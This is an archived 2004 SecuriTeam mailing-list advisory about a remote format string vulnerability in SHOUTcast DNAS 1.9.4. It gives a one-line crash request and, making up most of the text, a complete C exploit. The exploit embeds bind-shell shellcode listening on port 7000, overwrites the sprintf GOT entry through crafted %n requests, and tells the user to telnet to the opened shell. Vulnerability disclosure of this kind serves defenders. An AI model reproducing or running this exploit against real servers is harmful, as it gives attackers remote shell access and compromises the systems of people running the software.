[UNIX] SHOUTcast Remote Format String Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 12/27/04
- Previous message: SecuriTeam: "[UNIX] Cross Site Scripting in PsychoStats"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 27 Dec 2004 18:06:03 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SHOUTcast Remote Format String Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.shoutcast.com> SHOUTcast is "Nullsoft's Free WinAMP-based
distributed streaming audio system. Thousands of broadcasters around the
world are waiting for you to tune in and listen". A format string
vulnerability in SHOUTcast allows remote attackers to cause the program to
execute arbitrary code.
DETAILS
Vulnerable Systems:
* SHOUTcast version 1.9.4
Remote exploitation of a format string vulnerability could allow execution
of arbitrary code.
A part of request, which was sent by attacker to server, would be included
in second arg of sprintf() function (0x0804adc3 in Linux binary). It is
obviously not good from a security viewpoint. We can crash SHOUTcast in a
very easy way, using following request:
http://host:8000/content/%n.mp3
Or reach remote shell thanks to attached exploit's code.
Exploit:
/* SHOUTcast DNAS/Linux v1.9.4 format string remote exploit */
/* Damian Put <pucik@cc-team.org> Cyber-Crime Team (www.CC-Team.org) */
/* Tested on slackware 9.1 and 10.0 (0xbf3feee0) */
/* When exploit only crash SHOUTcast we should calculate new address: */
/* */
/* bash-2.05b$ gdb sc_serv core */
/* ... */
/* (gdb) x/x $edi */
/* 0xbe462270: 0x78257825 */
/* (gdb) x/x 0xbe462270-996 */
/* 0xbe461e8c: 0x5050c031 */
/* */
/* 0xbe461e8c - This is our shellcode addr */
/* */
/* Now we "only" must change format string code in req2 :-) */
#include <stdio.h>
#include <stdlib.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/* Default SHOUTcast port */
#define PORT 8000
char shellcode[] = //bindshellcode (port 7000)
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(int argc, char *argv[])
{
int sock;
char *host;
struct hostent *h;
struct sockaddr_in dest;
char req1[1024] = "GET /content/AA"
/* sprintf GOT addr */
"\x3c\x49\x06\x08\x3d\x49\x06\x08\x3e\x49\x06\x08\x3f\x49\x06\x08";
strcat(req1, shellcode);
strcat(req1, ".mp3 HTTP/1.0\r\n\r\n");
/* We cannot use %numberx and %number$n (filtered) */
/* 0xbf3feee0 - shellcode addr on slackware 9.1 */
char *req2 = "GET
/content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n.mp3"
" HTTP/1.0\r\n\r\n";
printf("SHOUTcast DNAS/Linux v1.9.4 format string remote exploit by
pucik www.CC-Team.org\n");
if(argc < 2)
{
printf("Usage: %s <host>\n", argv[0]);
exit(0);
}
host = argv[1];
if(!(h = gethostbyname(host)))
{
fprintf(stderr, "Cannot get IP of %s, %s!\n", host,
strerror(errno));
exit(-1);
}
sock = socket(PF_INET, SOCK_STREAM, 0);
dest.sin_addr=*((struct in_addr*)h->h_addr);
dest.sin_family = PF_INET;
dest.sin_port = htons(PORT);
if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr))
== -1)
{
fprintf(stderr, "Cannot connect to %s, %s!\n", host,
strerror(errno));
exit(-1);
}
printf("[*] Sending first request ...\n");
write(sock, req1, strlen(req1));
close(sock);
sock = socket(PF_INET, SOCK_STREAM, 0);
if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr))
== -1)
{
fprintf(stderr, "Cannot connect to %s, %s!\n", host,
strerror(errno));
exit(-1);
}
printf("[*] Sending second request ...\n");
write(sock, req2, strlen(req2));
close(sock);
printf("[*] Try telnet %s 7000 :)\n", host);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:pucik@cc-team.org> Damian
Put.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Cross Site Scripting in PsychoStats"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] Windows RRAS Stack Overflow (Exploit, MS06-025)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... There is a remote code execution
vulnerability in the Routing and Remote ... Microsoft Windows XP Service Pack 1 and
Microsoft Windows XP Service ... (Securiteam) - [NEWS] Arkeia Network Backup Client Allows Unauthenticated Remote Access to Computer
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The Arkeia Network Backup Client
allows a remote ... my $class = shift; ... sub Check { ...
(Securiteam) - [NT] COOL! Remote Control DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... excellent remote computing
system that is very easy to use. ... Remote Control 1.12 ... Control (server)
component that could allow a remote attacker to crash the ... (Securiteam) - [NEWS] Apple QuickTime Multiple Vulnerabilities (PICT, Integer Overflow, DoS)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... vulnerabilities have been discovered
in Apple's QuickTime. ... PICT Remote Memory Overwrite: ... Apple QuickTime
PictureViewer is reported prone to remote memory overwrite ... (Securiteam) - [NEWS] Adobe SVG Viewer Local and Remote File Reading
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... "Adobe SVG Viewer 3.0 is
available in 15 languages and many ... A vulnerability in Adobe's SVG allows remote
attackers to read locally ... (Securiteam)
